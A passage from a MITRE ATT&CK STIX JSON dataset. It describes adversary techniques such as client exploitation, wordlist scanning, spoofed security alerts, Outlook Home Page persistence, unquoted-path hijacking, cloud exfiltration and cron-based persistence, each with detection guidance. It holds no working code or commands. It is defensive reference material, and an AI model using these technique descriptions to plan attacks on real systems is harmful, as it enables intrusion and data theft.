"x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Exploitation for Client Execution", "description": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "x_mitre_system_requirements": ["Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1203", "external_id": "T1203"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:10.374Z", "name": "Program Download", "description": "Adversaries may perform a program download to transfer a user program to a controller. \n\nVariations of program download, such as online edit and program append, allow a controller to continue running during the transfer and reconfiguration process without interruption to process control. However, before starting a full program download (i.e., download all) a controller may need to go into a stop state. This can have negative consequences on the physical process, especially if the controller is not able to fulfill a time-sensitive action. Adversaries may choose to avoid a download all in favor of an online edit or program append to avoid disrupting the physical process. An adversary may need to use the technique Detect Operating Mode or Change Operating Mode to make sure the controller is in the proper mode to accept a program download.\n\nThe granularity of control to transfer a user program in whole or parts is dictated by the management protocol (e.g., S7CommPlus, TriStation) and underlying controller API. Thus, program download is a high-level term for the suite of vendor-specific API calls used to configure a controllers user program memory space. \n\n[Modify Controller Tasking](https://attack.mitre.org/techniques/T0821) and [Modify Program](https://attack.mitre.org/techniques/T0889) represent the configuration changes that are transferred to a controller via a program download.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Operational Databases: Device Alarm", "Network Traffic: Network Traffic Content", "Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0843", "external_id": "T0843"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Wordlist Scanning", "description": "Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).\n\nFor example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website\u2019s pages and directories.(Citation: ClearSky Lebanese Cedar Jan 2021) This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [Brute Force](https://attack.mitre.org/techniques/T1110)). \n\nAs cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.(Citation: S3Recon GitHub)(Citation: GCPBucketBrute) Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jan Petrov, Citi", "Elvis Veliz, Citi", "Richard Julian, Citi"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Monitor for access to S3 buckets, especially those that are not intended to be publicly accessible. \n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. \n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bed04f7d-e48a-4e76-bd0f-4c57fe31fc46", "created": "2022-03-04T18:56:38.844Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1595/003", "external_id": "T1595.003"}, {"source_name": "ClearSky Lebanese Cedar Jan 2021", "description": "ClearSky Cyber Security. (2021, January). \u201cLebanese Cedar\u201d APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.", "url": "https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf"}, {"source_name": "GCPBucketBrute", "description": "Spencer Gietzen. (2019, February 26). Google Cloud Platform (GCP) Bucket Enumeration and Privilege Escalation. Retrieved March 4, 2022.", "url": "https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/"}, {"source_name": "S3Recon GitHub", "description": "Travis Clarke. (2020, March 21). S3Recon GitHub. Retrieved March 4, 2022.", "url": "https://github.com/clarketm/s3recon"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-04-12T22:46:33.995Z", "name": "Spoof Security Alerting", "description": "Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders\u2019 awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.\n\nRather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a \u201chealthy\u201d system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.\n\nFor example, adversaries may show a fake Windows Security GUI and tray icon with a \u201chealthy\u201d system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Goldstein Menachem"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", "created": "2023-03-14T16:04:24.865Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1562/011", "external_id": "T1562.011"}, {"source_name": "BlackBasta", "description": "Antonio Cocomazzi and Antonio Pirozzi. (2022, November 3). Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor. Retrieved March 14, 2023.", "url": "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Outlook Home Page", "description": "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)\n\nOnce malicious home pages have been added to the user\u2019s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", "created": "2019-11-07T20:09:56.536Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1137/004", "external_id": "T1137.004"}, {"source_name": "SensePost Outlook Home Page", "description": "Stalmans, E. (2017, October 11). Outlook Home Page \u2013 Another Ruler Vector. Retrieved February 4, 2019.", "url": "https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/"}, {"source_name": "Microsoft Detect Outlook Forms", "description": "Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.", "url": "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack"}, {"source_name": "SensePost NotRuler", "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.", "url": "https://github.com/sensepost/notruler"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-12-26T20:59:21.941Z", "name": "Asymmetric Cryptography", "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver\u2019s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", "created": "2020-03-16T15:48:33.882Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1573/002", "external_id": "T1573.002"}, {"source_name": "SANS Decrypting SSL", "description": "Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.", "url": "http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840"}, {"source_name": "SEI SSL Inspection Risks", "description": "Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.", "url": "https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-09-15T19:11:47.547Z", "name": "Exfiltration to Cloud Storage", "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", "created": "2020-03-09T15:04:32.767Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1567/002", "external_id": "T1567.002"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-01T13:48:28.738Z", "name": "Lateral Tool Transfer", "description": "Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.\n\nAdversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019)\n\nFiles can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). In some cases, adversaries may be able to leverage [Web Service](https://attack.mitre.org/techniques/T1102)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.(Citation: Dropbox Malware Sync)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Shailesh Tiwary (Indian Army)"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for file creation and files transferred within a network using protocols such as SMB or FTP. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", "created": "2020-03-11T21:01:00.959Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1570", "external_id": "T1570"}, {"source_name": "Dropbox Malware Sync", "description": "David Talbot. (2013, August 21). Dropbox and Similar Services Can Sync Malware. Retrieved May 31, 2023.", "url": "https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/"}, {"source_name": "Unit42 LockerGoga 2019", "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.", "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Path Interception by Unquoted Path", "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Stefan Kanthak"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", "created": "2020-03-13T13:51:58.519Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/009", "external_id": "T1574.009"}, {"source_name": "Windows Privilege Escalation Guide", "description": "absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.", "url": "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/"}, {"source_name": "Windows Unquoted Services", "description": "HackHappy. (2018, April 23). Windows Privilege Escalation \u2013 Unquoted Services. Retrieved August 10, 2018.", "url": "https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/"}, {"source_name": "Help eliminate unquoted path", "description": "Mark Baggett. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved November 8, 2012.", "url": "https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464"}, {"source_name": "Microsoft CurrentControlSet Services", "description": "Microsoft. (2017, April 20). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved March 16, 2020.", "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Install Digital Certificate", "description": "Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)\n\nAdversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. \n\nAdversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c071d8c1-3b3a-4f22-9407-ca4e96921069", "created": "2021-03-17T20:32:13.793Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1608/003", "external_id": "T1608.003"}, {"source_name": "DigiCert Install SSL Cert", "description": "DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021.", "url": "https://www.digicert.com/kb/ssl-certificate-installation.htm"}, {"source_name": "Splunk Kovar Certificates 2017", "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.", "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Local Job Scheduling", "description": "On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).\n\n### cron\n\nSystem-wide cron jobs are installed by modifying /etc/crontab file, /etc/cron.d/ directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.\n\nThose methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.\n\n### at\n\nThe at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.\n\n### launchd\n\nEach launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https://attack.mitre.org/techniques/T1160) or [Launch Agent](https://attack.mitre.org/techniques/T1159), except there is an additional key called StartCalendarInterval with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Anastasios Pingios"], "x_mitre_detection": "Legitimate scheduled jobs may be created during installation of new software or through administration functions. Jobs scheduled with launchd and cron can be monitored from their respective utilities to list out detailed information about the jobs. Monitor process execution resulting from launchd and cron tasks to look for unusual or unknown applications and behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "User", "root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c0a384a4-9a25-40e1-97b6-458388474bc8", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1168", "external_id": "T1168"}, {"source_name": "Die.net Linux crontab Man Page", "description": "Paul Vixie. (n.d.). crontab(5) - Linux man page. Retrieved December 19, 2017.", "url": "https://linux.die.net/man/5/crontab"}, {"source_name": "Die.net Linux at Man Page", "description": "Thomas Koenig. (n.d.). at(1) - Linux man page. Retrieved December 19, 2017.", "url": "https://linux.die.net/man/1/at"}, {"source_name": "AppleDocs Scheduling Timed Jobs", "description": "Apple. (n.d.). Retrieved July 17, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html"}, {"source_name": "Janicab", "description": "Thomas. (2013, July 15). New signed malware called Janicab. Retrieved July 17, 